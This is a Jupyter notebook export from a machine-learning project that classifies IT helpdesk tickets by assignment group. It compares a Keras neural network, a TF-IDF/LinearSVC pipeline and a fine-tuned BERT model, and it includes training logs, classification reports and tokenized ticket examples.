model_normalized.add(Dense(100, activation='relu', kernel_initializer=initializer))
model_normalized.add(Dropout(0.1))
model_normalized.add(Dense(74, activation='softmax'))
In [0]:
model_normalized.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
In [0]:
epochs_initializer_test = 10
In [0]:
history_normalized = model_normalized.fit(X_train, 
                    y_train, 
                    epochs=epochs_initializer_test, 
                    batch_size=batch_size,
                    validation_data=(X_test, y_test),
                    callbacks=[EarlyStopping(monitor='val_loss', patience=3, min_delta=0.0001)])
Train on 6792 samples, validate on 1699 samples
Epoch 1/10
6792/6792 [==============================] - 124s 18ms/sample - loss: 2.4786 - accuracy: 0.4957 - val_loss: 2.0100 - val_accuracy: 0.5444
Epoch 2/10
6792/6792 [==============================] - 112s 17ms/sample - loss: 1.8679 - accuracy: 0.5504 - val_loss: 1.7768 - val_accuracy: 0.5721
Epoch 3/10
6792/6792 [==============================] - 110s 16ms/sample - loss: 1.6966 - accuracy: 0.5748 - val_loss: 1.6516 - val_accuracy: 0.6045
Epoch 4/10
6792/6792 [==============================] - 110s 16ms/sample - loss: 1.5986 - accuracy: 0.5839 - val_loss: 1.6176 - val_accuracy: 0.6057
Epoch 5/10
6792/6792 [==============================] - 109s 16ms/sample - loss: 1.5358 - accuracy: 0.5938 - val_loss: 1.5740 - val_accuracy: 0.6092
Epoch 6/10
6792/6792 [==============================] - 112s 17ms/sample - loss: 1.4639 - accuracy: 0.6023 - val_loss: 1.5228 - val_accuracy: 0.6151
Epoch 7/10
6792/6792 [==============================] - 114s 17ms/sample - loss: 1.4044 - accuracy: 0.6134 - val_loss: 1.4742 - val_accuracy: 0.6127
Epoch 8/10
6792/6792 [==============================] - 120s 18ms/sample - loss: 1.3419 - accuracy: 0.6250 - val_loss: 1.4699 - val_accuracy: 0.6215
Epoch 9/10
6792/6792 [==============================] - 117s 17ms/sample - loss: 1.3076 - accuracy: 0.6324 - val_loss: 1.4455 - val_accuracy: 0.6198
Epoch 10/10
6792/6792 [==============================] - 112s 16ms/sample - loss: 1.2627 - accuracy: 0.6385 - val_loss: 1.4264 - val_accuracy: 0.6327
Plot the Accuracy of the classifier
In [0]:
plt.plot(history_normalized.history['accuracy'])
plt.plot(history_normalized.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()

Plot the Loss of the Classifier

In [0]:
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
In [0]:
y_pred_normalized = model_normalized.predict(X_test)
In [0]:
acc_test_normalized = model_normalized.evaluate(X_test,y_test)
print("Test Accuracy:",acc_test_normalized[1])

acc_train_normalized = model_normalized.evaluate(X_train,y_train)
print("Train Accuracy:",acc_train_normalized[1])
1699/1699 [==============================] - 6s 3ms/sample - loss: 1.4264 - accuracy: 0.6327
Test Accuracy: 0.6327251
6792/6792 [==============================] - 22s 3ms/sample - loss: 1.0782 - accuracy: 0.6832
Train Accuracy: 0.68315667
In [0]:
print('Classification report:\n %s' % (classification_report(y_test.argmax(axis=1), y_pred_normalized.argmax(axis=1))))
Classification report:
               precision    recall  f1-score   support

           0       0.71      0.94      0.81       781
           1       0.00      0.00      0.00         6
           2       0.36      0.15      0.22        26
           3       0.00      0.00      0.00        11
           4       0.56      0.40      0.47        57
           5       0.31      0.45      0.37        33
           6       0.44      0.31      0.36        26
           7       0.50      0.08      0.13        13
           8       0.00      0.00      0.00        19
           9       0.83      1.00      0.91        15
          10       0.36      0.42      0.38        12
          11       0.40      0.05      0.09        39
          12       0.45      0.48      0.47        56
          13       0.00      0.00      0.00         9
          14       0.00      0.00      0.00         4
          15       0.20      0.20      0.20         5
          16       0.75      0.60      0.67         5
          17       0.84      0.81      0.82        67
          18       0.40      0.21      0.28        19
          19       0.00      0.00      0.00         9
          20       0.00      0.00      0.00         3
          21       0.00      0.00      0.00        11
          22       0.50      0.12      0.19        17
          23       0.39      0.35      0.37        34
          24       0.28      0.71      0.40         7
          25       0.00      0.00      0.00        11
          26       0.00      0.00      0.00         1
          27       0.39      0.30      0.34        23
          28       0.75      0.21      0.33        14
          30       0.00      0.00      0.00         3
          31       0.00      0.00      0.00         3
          33       0.00      0.00      0.00         6
          34       0.50      0.12      0.20        24
          35       0.30      0.27      0.29        11
          36       1.00      0.10      0.18        10
          37       0.00      0.00      0.00         7
          38       0.00      0.00      0.00         3
          39       0.00      0.00      0.00         3
          40       0.00      0.00      0.00         8
          41       0.00      0.00      0.00         1
          42       0.00      0.00      0.00         4
          43       0.00      0.00      0.00         3
          45       1.00      0.04      0.08        23
          46       0.00      0.00      0.00         3
          47       0.00      0.00      0.00         1
          48       0.00      0.00      0.00         3
          49       0.00      0.00      0.00         2
          51       0.00      0.00      0.00         1
          53       0.00      0.00      0.00         1
          54       0.00      0.00      0.00         1
          55       0.00      0.00      0.00         2
          56       0.33      0.17      0.23        29
          57       0.00      0.00      0.00         6
          58       0.00      0.00      0.00         1
          59       0.00      0.00      0.00         3
          62       0.00      0.00      0.00         1
          63       0.00      0.00      0.00         1
          66       0.00      0.00      0.00         1
          67       1.00      0.12      0.21        17
          70       0.00      0.00      0.00         1
          71       0.00      0.00      0.00         1
          72       0.57      0.90      0.70       144
          73       0.38      0.13      0.20        38

    accuracy                           0.63      1699
   macro avg       0.23      0.15      0.16      1699
weighted avg       0.57      0.63      0.57      1699

/Users/rishinarang/anaconda3/lib/python3.7/site-packages/sklearn/metrics/_classification.py:1272: UndefinedMetricWarning:

Precision and F-score are ill-defined and being set to 0.0 in labels with no predicted samples. Use `zero_division` parameter to control this behavior.

Observations :

Comparing with the Bidirectional LSTM model with merge_mode="sum", after adding the kernel_initializer=GlorotNormal() in the Dense layer, the test accuracy is almost same as 63%. Training accuracy reduced from 75% to 68%. F1 score is 0.57. We can prefer to use GlorotNormal.

5. Pipeline

Pipelines work by allowing for a linear sequence of data transforms to be chained together culminating in a modeling process that can be evaluated. Python scikit-learn provides a Pipeline utility to help automate machine learning workflows.The goal is to ensure that all of the steps in the pipeline are constrained to the data available for the evaluation, such as the training dataset or each fold of the cross validation procedure.

In [0]:
# this calculates a vector of term frequencies
vect = CountVectorizer()
# this normalizes each term frequency
tfidf = TfidfTransformer()
#linear SVM classifier
clf = LinearSVC()
In [0]:
from sklearn.pipeline import Pipeline
nlp_pipeline = Pipeline([
    ('vect',vect),
    ('tfidf',tfidf),
    ('clf',clf)
])
In [0]:
#Splitting the train and test data
X_train_pip, X_test_pip, y_train_pip, y_test_pip = train_test_split(tickets_corpus['ticket_Desc_lemm'], tickets_corpus['Assignment group'], random_state = 0)
X_train_pip.shape,y_train_pip.shape,X_test_pip.shape,y_test_pip.shape
Out[0]:
((6368,), (6368,), (2123,), (2123,))
In [0]:
#fit trian data to the pipeline
nlp_pipeline.fit(X_train_pip,y_train_pip)
Out[0]:
Pipeline(memory=None,
         steps=[('vect',
                 CountVectorizer(analyzer='word', binary=False,
                                 decode_error='strict',
                                 dtype=<class 'numpy.int64'>, encoding='utf-8',
                                 input='content', lowercase=True, max_df=1.0,
                                 max_features=None, min_df=1,
                                 ngram_range=(1, 1), preprocessor=None,
                                 stop_words=None, strip_accents=None,
                                 token_pattern='(?u)\\b\\w\\w+\\b',
                                 tokenizer=None, vocabulary=None)),
                ('tfidf',
                 TfidfTransformer(norm='l2', smooth_idf=True,
                                  sublinear_tf=False, use_idf=True)),
                ('clf',
                 LinearSVC(C=1.0, class_weight=None, dual=True,
                           fit_intercept=True, intercept_scaling=1,
                           loss='squared_hinge', max_iter=1000,
                           multi_class='ovr', penalty='l2', random_state=None,
                           tol=0.0001, verbose=0))],
         verbose=False)
In [0]:
# predict test instances
y_preds = nlp_pipeline.predict(X_test_pip)

# calculate f1
mean_f1 = f1_score(y_test_pip, y_preds, average='micro')
print('Mean f1 Score ---',mean_f1)
Mean f1 Score --- 0.6947715496938295
In [0]:
print(classification_report(y_test_pip, y_preds))
              precision    recall  f1-score   support

       GRP_0       0.75      0.94      0.83      1019
       GRP_1       0.33      0.20      0.25         5
      GRP_10       0.57      0.44      0.50        27
      GRP_11       1.00      0.14      0.25         7
      GRP_12       0.60      0.61      0.61        67
      GRP_13       0.67      0.61      0.64        36
      GRP_14       0.61      0.37      0.46        30
      GRP_15       0.57      0.25      0.35        16
      GRP_16       0.23      0.14      0.18        21
      GRP_17       0.85      0.89      0.87        19
      GRP_18       0.48      0.55      0.51        20
      GRP_19       0.33      0.17      0.22        59
       GRP_2       0.55      0.41      0.47        51
      GRP_20       0.25      0.09      0.13        11
      GRP_21       0.00      0.00      0.00         7
      GRP_22       0.50      0.33      0.40         3
      GRP_23       0.75      0.43      0.55         7
      GRP_24       0.87      0.88      0.87        74
      GRP_25       0.56      0.56      0.56        25
      GRP_26       0.00      0.00      0.00        10
      GRP_27       0.00      0.00      0.00         3
      GRP_28       0.50      0.12      0.20         8
      GRP_29       0.57      0.52      0.54        25
       GRP_3       0.45      0.35      0.39        49
      GRP_30       1.00      0.27      0.43        11
      GRP_31       1.00      0.19      0.32        21
      GRP_33       0.47      0.47      0.47        19
      GRP_34       0.67      0.18      0.29        11
      GRP_36       0.00      0.00      0.00         1
      GRP_37       0.50      0.25      0.33         4
      GRP_39       0.60      0.75      0.67         4
       GRP_4       0.62      0.19      0.29        27
      GRP_40       0.29      0.20      0.24        10
      GRP_41       0.73      0.73      0.73        11
      GRP_42       0.67      0.22      0.33         9
      GRP_43       0.50      1.00      0.67         1
      GRP_44       0.50      0.25      0.33         4
      GRP_45       0.25      0.10      0.14        10
      GRP_46       0.00      0.00      0.00         2
      GRP_47       0.00      0.00      0.00         6
      GRP_48       0.00      0.00      0.00         8
      GRP_49       0.00      0.00      0.00         1
       GRP_5       0.62      0.56      0.59        27
      GRP_50       0.00      0.00      0.00         5
      GRP_51       0.00      0.00      0.00         2
      GRP_52       0.00      0.00      0.00         3
      GRP_53       0.00      0.00      0.00         7
      GRP_55       1.00      0.25      0.40         4
      GRP_56       0.00      0.00      0.00         1
      GRP_57       0.00      0.00      0.00         1
      GRP_59       0.00      0.00      0.00         2
       GRP_6       0.64      0.44      0.52        32
      GRP_60       0.50      0.20      0.29         5
      GRP_62       0.00      0.00      0.00         5
      GRP_63       0.00      0.00      0.00         0
      GRP_64       0.00      0.00      0.00         1
      GRP_65       0.00      0.00      0.00         3
      GRP_66       0.00      0.00      0.00         2
      GRP_68       0.00      0.00      0.00         2
       GRP_7       0.68      0.50      0.58        26
      GRP_70       0.00      0.00      0.00         1
       GRP_8       0.68      0.83      0.75       181
       GRP_9       0.68      0.31      0.43        54

    accuracy                           0.69      2123
   macro avg       0.39      0.27      0.29      2123
weighted avg       0.66      0.69      0.66      2123

/Users/rishinarang/anaconda3/lib/python3.7/site-packages/sklearn/metrics/_classification.py:1272: UndefinedMetricWarning:

Precision and F-score are ill-defined and being set to 0.0 in labels with no predicted samples. Use `zero_division` parameter to control this behavior.

/Users/rishinarang/anaconda3/lib/python3.7/site-packages/sklearn/metrics/_classification.py:1272: UndefinedMetricWarning:

Recall and F-score are ill-defined and being set to 0.0 in labels with no true samples. Use `zero_division` parameter to control this behavior.

Observations:

Pipeline and Feature Union as such doesnot improve performance of the models. Its adds more value by combining different rules and models, we can define out own transformers that will improve the performance. Here we have done basic pipeline model.

Pipelines help in optimizing entire workflow, preventing data leakage and code simplicity.

BERT : State of the Art NLP Model

BERT (Bidirectional Encoder Representations from Transformers).
BERT’s key technical innovation is applying the bidirectional training of Transformer, a popular attention model, to language modelling.This is in contrast to previous efforts which looked at a text sequence either from left to right or combined left-to-right and right-to-left training.
Here we used BERT_MODEL = 'uncased_L-12_H-768_A-12'

In [24]:
import tensorflow as tf

device_name = tf.test.gpu_device_name()
if device_name != '/device:GPU:0':
  raise SystemError('GPU device not found')
print('Found GPU at: {}'.format(device_name))
Found GPU at: /device:GPU:0
In [25]:
import tensorflow_hub as hub
print("tensorflow version : ", tf.__version__)
print("tensorflow_hub version : ", hub.__version__)
print(tf.__version__)
tensorflow version :  1.15.0
tensorflow_hub version :  0.8.0
1.15.0
In [0]:
!pip uninstall tensorflow==2.2.0
In [0]:
!pip install tensorflow==1.15.0
In [27]:
%cd /content/drive/My Drive/BERT/
/content/drive/My Drive/BERT
In [0]:
#Install necessary pretrained models files related to BERT.
!wget https://storage.googleapis.com/bert_models/2018_10_18/uncased_L-12_H-768_A-12.zip
!wget https://raw.githubusercontent.com/google-research/bert/master/modeling.py 
!wget https://raw.githubusercontent.com/google-research/bert/master/optimization.py 
!wget https://raw.githubusercontent.com/google-research/bert/master/run_classifier.py 
!wget https://raw.githubusercontent.com/google-research/bert/master/tokenization.py 
In [29]:
import modeling
import optimization
import run_classifier
import tokenization
WARNING:tensorflow:From /content/drive/My Drive/BERT/optimization.py:87: The name tf.train.Optimizer is deprecated. Please use tf.compat.v1.train.Optimizer instead.

In [0]:
#Establishing path in gdrive for BERT model zip extraction
folder = '/content/drive/My Drive/BERT/'
with zipfile.ZipFile("uncased_L-12_H-768_A-12.zip","r") as zip_ref:
    zip_ref.extractall(folder)

Create Folder for storing Model Output. We have decided to use the "bert_uncased_L-12_H-768_A-12" model. We will be using the vocab.txt file in the model to map the words in the dataset to indexes. Also the loaded BERT model is trained on uncased/lowercase data and hence the data we feed to train the model should also be of lowercase which is already performed in milestone 1 preprocessing work.

In [31]:
BERT_MODEL = 'uncased_L-12_H-768_A-12'
BERT_PRETRAINED_DIR = '/content/drive/My Drive/BERT/uncased_L-12_H-768_A-12'
OUTPUT_DIR = f'{folder}/outputs'
print(f'>> Model output directory: {OUTPUT_DIR}')
print(f'>>  BERT pretrained directory: {BERT_PRETRAINED_DIR}')
>> Model output directory: /content/drive/My Drive/BERT//outputs
>>  BERT pretrained directory: /content/drive/My Drive/BERT/uncased_L-12_H-768_A-12
In [0]:
X=tickets_corpus["ticket_Desc_lemm"].values
le = preprocessing.LabelEncoder()
le.fit(tickets_corpus['Assignment group'].values)
y = le.transform(tickets_corpus['Assignment group'].values)

#Split the dataframe into train and test in 80:20 split
X_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.2, random_state=42)
In [33]:
#change path to Folder where model is located
%cd /content/drive/My Drive/BERT/uncased_L-12_H-768_A-12
/content/drive/My Drive/BERT/uncased_L-12_H-768_A-12

Create definition for importing dataset as per BERT input requirements. Also define necessary hyperparamters for model. We will try different Batch size, learning rate and maximum sequence lengths to achieve best possible accuracy and F1 score.

In [34]:
def create_examples(lines, set_type, labels=None):
#Generate data for the BERT model
    guid = f'{set_type}'
    examples = []
    if guid == 'train':
        for line, label in zip(lines, labels):
            text_a = line
            label = str(label)
            examples.append(
              run_classifier.InputExample(guid=guid, text_a=text_a, text_b=None, label=label))
    else:
        for line in lines:
            text_a = line
            label = '0'
            examples.append(
              run_classifier.InputExample(guid=guid, text_a=text_a, text_b=None, label=label))
    return examples

# Model Hyper Parameters
TRAIN_BATCH_SIZE = 16
EVAL_BATCH_SIZE = 8
LEARNING_RATE = 2e-5
NUM_TRAIN_EPOCHS = 8.0
WARMUP_PROPORTION = 0.1
MAX_SEQ_LENGTH = 128
# Model configs
SAVE_CHECKPOINTS_STEPS = 1000 #if you wish to finetune a model on a larger dataset, use larger interval
# each checpoint weights about 1,5gb
ITERATIONS_PER_LOOP = 1000
NUM_TPU_CORES = 8
VOCAB_FILE = os.path.join(BERT_PRETRAINED_DIR, 'vocab.txt')
CONFIG_FILE = os.path.join(BERT_PRETRAINED_DIR, 'bert_config.json')
INIT_CHECKPOINT = os.path.join(BERT_PRETRAINED_DIR, 'bert_model.ckpt')
DO_LOWER_CASE = BERT_MODEL.startswith('uncased')

label_list = [str(num) for num in range(74)]
tokenizer = tokenization.FullTokenizer(vocab_file=VOCAB_FILE, do_lower_case=DO_LOWER_CASE)
train_examples = create_examples(X_train, 'train', labels=y_train)

tpu_cluster_resolver = None #Since training will happen on GPU, we won't need a cluster resolver
#TPUEstimator also supports training on CPU and GPU. You don't need to define a separate tf.estimator.Estimator.
run_config = tf.contrib.tpu.RunConfig(
    cluster=tpu_cluster_resolver,
    model_dir=OUTPUT_DIR,
    save_checkpoints_steps=SAVE_CHECKPOINTS_STEPS,
    tpu_config=tf.contrib.tpu.TPUConfig(
        iterations_per_loop=ITERATIONS_PER_LOOP,
        num_shards=NUM_TPU_CORES,
        per_host_input_for_training=tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2))

num_train_steps = int(
    len(train_examples) / TRAIN_BATCH_SIZE * NUM_TRAIN_EPOCHS)
num_warmup_steps = int(num_train_steps * WARMUP_PROPORTION)

model_fn = run_classifier.model_fn_builder(
    bert_config=modeling.BertConfig.from_json_file(CONFIG_FILE),
    num_labels=len(label_list),
    init_checkpoint=INIT_CHECKPOINT,
    learning_rate=LEARNING_RATE,
    num_train_steps=num_train_steps,
    num_warmup_steps=num_warmup_steps,
    use_tpu=False, #If False training will fall on CPU or GPU, depending on what is available  
    use_one_hot_embeddings=True)

estimator = tf.contrib.tpu.TPUEstimator(
    use_tpu=False, #If False training will fall on CPU or GPU, depending on what is available 
    model_fn=model_fn,
    config=run_config,
    train_batch_size=TRAIN_BATCH_SIZE,
    eval_batch_size=EVAL_BATCH_SIZE)
WARNING:tensorflow:From /content/drive/My Drive/BERT/tokenization.py:125: The name tf.gfile.GFile is deprecated. Please use tf.io.gfile.GFile instead.

WARNING:tensorflow:
The TensorFlow contrib module will not be included in TensorFlow 2.0.
For more information, please see:
  * https://github.com/tensorflow/community/blob/master/rfcs/20180907-contrib-sunset.md
  * https://github.com/tensorflow/addons
  * https://github.com/tensorflow/io (for I/O related ops)
If you depend on functionality not listed there, please file an issue.

WARNING:tensorflow:Estimator's model_fn (<function model_fn_builder.<locals>.model_fn at 0x7f0796f96bf8>) includes params argument, but params are not passed to Estimator.
INFO:tensorflow:Using config: {'_model_dir': '/content/drive/My Drive/BERT//outputs', '_tf_random_seed': None, '_save_summary_steps': 100, '_save_checkpoints_steps': 1000, '_save_checkpoints_secs': None, '_session_config': allow_soft_placement: true
graph_options {
  rewrite_options {
    meta_optimizer_iterations: ONE
  }
}
, '_keep_checkpoint_max': 5, '_keep_checkpoint_every_n_hours': 10000, '_log_step_count_steps': None, '_train_distribute': None, '_device_fn': None, '_protocol': None, '_eval_distribute': None, '_experimental_distribute': None, '_experimental_max_worker_delay_secs': None, '_session_creation_timeout_secs': 7200, '_service': None, '_cluster_spec': <tensorflow.python.training.server_lib.ClusterSpec object at 0x7f069319ef60>, '_task_type': 'worker', '_task_id': 0, '_global_id_in_cluster': 0, '_master': '', '_evaluation_master': '', '_is_chief': True, '_num_ps_replicas': 0, '_num_worker_replicas': 1, '_tpu_config': TPUConfig(iterations_per_loop=1000, num_shards=8, num_cores_per_replica=None, per_host_input_for_training=3, tpu_job_name=None, initial_infeed_sleep_secs=None, input_partition_dims=None, eval_training_input_configuration=2, experimental_host_call_every_n_steps=1), '_cluster': None}
INFO:tensorflow:_TPUContext: eval_on_tpu True
WARNING:tensorflow:eval_on_tpu ignored because use_tpu is False.

Convert our train and validation features to InputFeatures that BERT understands.Create a funciton to train the model.

In [0]:
print('Please wait...')
train_features = run_classifier.convert_examples_to_features(
    train_examples, label_list, MAX_SEQ_LENGTH, tokenizer)
print('>> Started training at {} '.format(datetime.datetime.now()))
print('  Num examples = {}'.format(len(train_examples)))
print('  Batch size = {}'.format(TRAIN_BATCH_SIZE))
tf.logging.info("  Num steps = %d", num_train_steps)
train_input_fn = run_classifier.input_fn_builder(
    features=train_features,
    seq_length=MAX_SEQ_LENGTH,
    is_training=True,
    drop_remainder=True)
estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)
print('>> Finished training at {}'.format(datetime.datetime.now()))
In [0]:
def input_fn_builder(features, seq_length, is_training, drop_remainder):
  """Creates an `input_fn` closure to be passed to TPUEstimator."""

  all_input_ids = []
  all_input_mask = []
  all_segment_ids = []
  all_label_ids = []

  for feature in features:
    all_input_ids.append(feature.input_ids)
    all_input_mask.append(feature.input_mask)
    all_segment_ids.append(feature.segment_ids)
    all_label_ids.append(feature.label_id)

  def input_fn(params):
    """The actual input function."""
    print(params)
    batch_size = 500

    num_examples = len(features)

    d = tf.data.Dataset.from_tensor_slices({
        "input_ids":
            tf.constant(
                all_input_ids, shape=[num_examples, seq_length],
                dtype=tf.int32),
        "input_mask":
            tf.constant(
                all_input_mask,
                shape=[num_examples, seq_length],
                dtype=tf.int32),
        "segment_ids":
            tf.constant(
                all_segment_ids,
                shape=[num_examples, seq_length],
                dtype=tf.int32),
        "label_ids":
            tf.constant(all_label_ids, shape=[num_examples], dtype=tf.int32),
    })

    if is_training:
      d = d.repeat()
      d = d.shuffle(buffer_size=100)

    d = d.batch(batch_size=batch_size, drop_remainder=drop_remainder)
    return d

  return input_fn

Creating prediction function to run on test dataset

In [37]:
predict_examples = create_examples(X_test, 'test')

predict_features = run_classifier.convert_examples_to_features(
    predict_examples, label_list, MAX_SEQ_LENGTH, tokenizer)

predict_input_fn = input_fn_builder(
    features=predict_features,
    seq_length=MAX_SEQ_LENGTH,
    is_training=False,
    drop_remainder=False)

result = estimator.predict(input_fn=predict_input_fn)
INFO:tensorflow:Writing example 0 of 1699
INFO:tensorflow:*** Example ***
INFO:tensorflow:guid: test
INFO:tensorflow:tokens: [CLS] need access user collaboration ##pl ##at ##form need access user collaboration ##pl ##at ##forms ##um ##mar ##y ##co ##w ##q ##y ##j ##z ##m f ##z ##s ##x ##ga ##pt inform ste ##fy ##ty sm ##hd ##y ##ht ##is collaboration ##pl ##at ##form business permanently del ##ete day need access collaboration ##pl ##at ##form see need [SEP]
INFO:tensorflow:input_ids: 101 2342 3229 5310 5792 24759 4017 14192 2342 3229 5310 5792 24759 4017 22694 2819 7849 2100 3597 2860 4160 2100 3501 2480 2213 1042 2480 2015 2595 3654 13876 12367 26261 12031 3723 15488 14945 2100 11039 2483 5792 24759 4017 14192 2449 8642 3972 12870 2154 2342 3229 5792 24759 4017 14192 2156 2342 102 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:input_mask: 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:segment_ids: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:label: 0 (id = 0)
INFO:tensorflow:*** Example ***
INFO:tensorflow:guid: test
INFO:tensorflow:tokens: [CLS] host ##name sid volume dev ##hd server space consume space mb host ##name sid volume dev ##hd server space consume space mb [SEP]
INFO:tensorflow:input_ids: 101 3677 18442 15765 3872 16475 14945 8241 2686 16678 2686 16914 3677 18442 15765 3872 16475 14945 8241 2686 16678 2686 16914 102 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:input_mask: 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:segment_ids: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:label: 0 (id = 0)
INFO:tensorflow:*** Example ***
INFO:tensorflow:guid: test
INFO:tensorflow:tokens: [CLS] sid account lock sid account lock [SEP]
INFO:tensorflow:input_ids: 101 15765 4070 5843 15765 4070 5843 102 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:input_mask: 1 1 1 1 1 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:segment_ids: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:label: 0 (id = 0)
INFO:tensorflow:*** Example ***
INFO:tensorflow:guid: test
INFO:tensorflow:tokens: [CLS] order subject ra ##df ##w order team ##kind ##ly assist unable create d ##n h ##yd ##st ##he ##ud md ##d ##w ##wyl ##eh ##oper ##ation supervisor ##com ##pan ##y distribution service asia pt ##e asia regional distribution centre ##ema ##il r ##x ##oy ##n ##v ##gin ##t ##g ##ds ##eh ##l ##gm ##ail ##com ##su ##b ##ject order din ##ple ##ase create help ##ju ##hu jo ##j ##fu ##f ##na ##p logistics managers ##ub ##ject order za ##d ##nr ##yu ##in ##udi ##nr ##q ##f ##hi ##ong z ##k ##w ##f ##qa ##gb team create st ##o author ##ize create d ##n plant warehouse person create d ##n st ##o [SEP]
INFO:tensorflow:input_ids: 101 2344 3395 10958 20952 2860 2344 2136 18824 2135 6509 4039 3443 1040 2078 1044 25688 3367 5369 6784 9108 2094 2860 27740 11106 25918 3370 12366 9006 9739 2100 4353 2326 4021 13866 2063 4021 3164 4353 2803 14545 4014 1054 2595 6977 2078 2615 11528 2102 2290 5104 11106 2140 21693 12502 9006 6342 2497 20614 2344 11586 10814 11022 3443 2393 9103 6979 8183 3501 11263 2546 2532 2361 12708 10489 12083 20614 2344 23564 2094 16118 10513 2378 21041 16118 4160 2546 4048 5063 1062 2243 2860 2546 19062 18259 2136 3443 2358 2080 3166 4697 3443 1040 2078 3269 9746 2711 3443 1040 2078 2358 2080 102 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
INFO:tensorflow:input_mask: 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
